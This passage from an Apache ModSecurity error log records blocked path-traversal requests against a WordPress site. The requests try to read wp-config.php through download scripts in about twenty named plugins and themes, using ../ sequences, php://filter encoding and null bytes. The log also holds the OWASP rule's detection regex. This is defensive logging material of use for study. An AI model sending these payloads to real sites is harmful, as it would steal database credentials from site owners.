"/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZJiRpNjYcHyO0P41DG2aWwAAAU0"] [Sun Jun 25 14:12:37.034191 2023] [:error] [pid 6294:tid 140255747356416] [client 23.155.24.2:40518] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZJiRpdjYcHyO0P41DG2aXAAAAUo"] [Sun Jun 25 14:12:37.825636 2023] [:error] [pid 6294:tid 140255755749120] [client 23.155.24.2:40520] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZJiRpdjYcHyO0P41DG2aXQAAAUk"] [Sun Jun 25 14:12:38.692343 2023] [:error] [pid 6294:tid 140255887673088] [client 23.155.24.2:40524] [client 23.155.24.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php://filter/read=convert.base64-encode/resource=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZJiRptjYcHyO0P41DG2aXwAAAUI"] [Sun Jun 25 14:12:39.548226 2023] [:error] [pid 6294:tid 140255772534528] [client 104.192.1.138:40526] [client 104.192.1.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZJiRp9jYcHyO0P41DG2aYAAAAUc"] [Sun Jun 25 14:12:42.767998 2023] [:error] [pid 24793:tid 140255755749120] [client 104.192.1.138:40530] [client 104.192.1.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZJiRqo27ibjPM5oQg142CgAAAAk"] [Sun Jun 25 14:12:43.812113 2023] [:error] [pid 6294:tid 140255862494976] [client 104.192.1.138:40534] [client 104.192.1.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZJiRq9jYcHyO0P41DG2aYgAAAUU"] [Sun Jun 25 14:12:49.222320 2023] [:error] [pid 24794:tid 140255764141824] [client 104.192.1.138:40544] [client 104.192.1.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZJiRsfmk349J9ip3GVxZjQAAAEg"] [Sun Jun 25 14:12:51.023868 2023] [:error] [pid 24794:tid 140255697000192] [client 185.220.101.136:40550] [client 185.220.101.136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=php://filter/read=convert.base64-encode/resource=../../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZJiRs_mk349J9ip3GVxZjgAAAFA"] [Sun Jun 25 14:12:57.545461 2023] [:error] [pid 6220:tid 140255904458496] [client 178.17.174.198:40612] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZJiRueP43hfhSzKM50NAZAAAAQA"] [Sun Jun 25 14:12:58.443862 2023] [:error] [pid 24795:tid 140255772534528] [client 178.17.174.198:40620] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../wp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZJiRuvMRudKiOmssFP6IFgAAAIc"] [Sun Jun 25 14:13:00.336804 2023] [:error] [pid 24795:tid 140255705392896] [client 178.17.174.198:40624] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZJiRvPMRudKiOmssFP6IFwAAAI8"] [Sun Jun 25 14:13:01.191819 2023] [:error] [pid 24793:tid 140255887673088] [client 178.17.174.198:40630] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZJiRvY27ibjPM5oQg142CwAAAAI"] [Sun Jun 25 14:13:02.061130 2023] [:error] [pid 24992:tid 140255629858560] [client 178.17.174.198:40640] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZJiRvtki1nVtQtQNGjpG9gAAANg"] [Sun Jun 25 14:13:02.959514 2023] [:error] [pid 24992:tid 140255738963712] [client 178.17.174.198:40644] [client 178.17.174.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZJiRvtki1nVtQtQNGjpG9wAAAMs"] [Sun Jun 25 14:13:05.428889 2023] [:error] [pid 24992:tid 140255730571008] [client 107.189.5.121:40658] [client 107.189.5.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZJiRwdki1nVtQtQNGjpG-QAAAMw"] [Sun Jun 25 14:13:06.590262 2023] [:error] [pid 24992:tid 140255671822080] [client 185.220.102.241:40666] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "ZJiRwtki1nVtQtQNGjpG-gAAANM"] [Sun Jun 25 14:13:08.322948 2023] [:error] [pid 6294:tid 140255671822080] [client 185.220.102.241:40716] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "ZJiRxNjYcHyO0P41DG2acgAAAVM"] [Sun Jun 25 14:13:09.780091 2023] [:error] [pid 6294:tid 140255870887680] [client 185.220.102.241:40782] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZJiRxdjYcHyO0P41DG2afAAAAUQ"] [Sun Jun 25 14:13:11.050739 2023] [:error] [pid 6294:tid 140255755749120] [client 185.220.102.241:40806] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZJiRx9jYcHyO0P41DG2ahQAAAUk"] [Sun Jun 25 14:13:12.174928 2023] [:error] [pid 6294:tid 140255862494976] [client 185.220.102.241:40812] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZJiRyNjYcHyO0P41DG2ahwAAAUU"] [Sun Jun 25 14:13:13.351359 2023] [:error] [pid 6294:tid 140255663429376] [client 185.220.102.241:40830] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZJiRydjYcHyO0P41DG2ajAAAAVQ"] [Sun Jun 25 14:13:14.636991 2023] [:error] [pid 24992:tid 140255713785600] [client 185.220.102.241:40852] [client 185.220.102.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "ZJiRytki1nVtQtQNGjpHAAAAAM4"] [Sun Jun 25 14:13:15.824390 2023] [:error] [pid 6294:tid 140255755749120] [client 185.220.102.241:40858] [client 185.220.102.241] 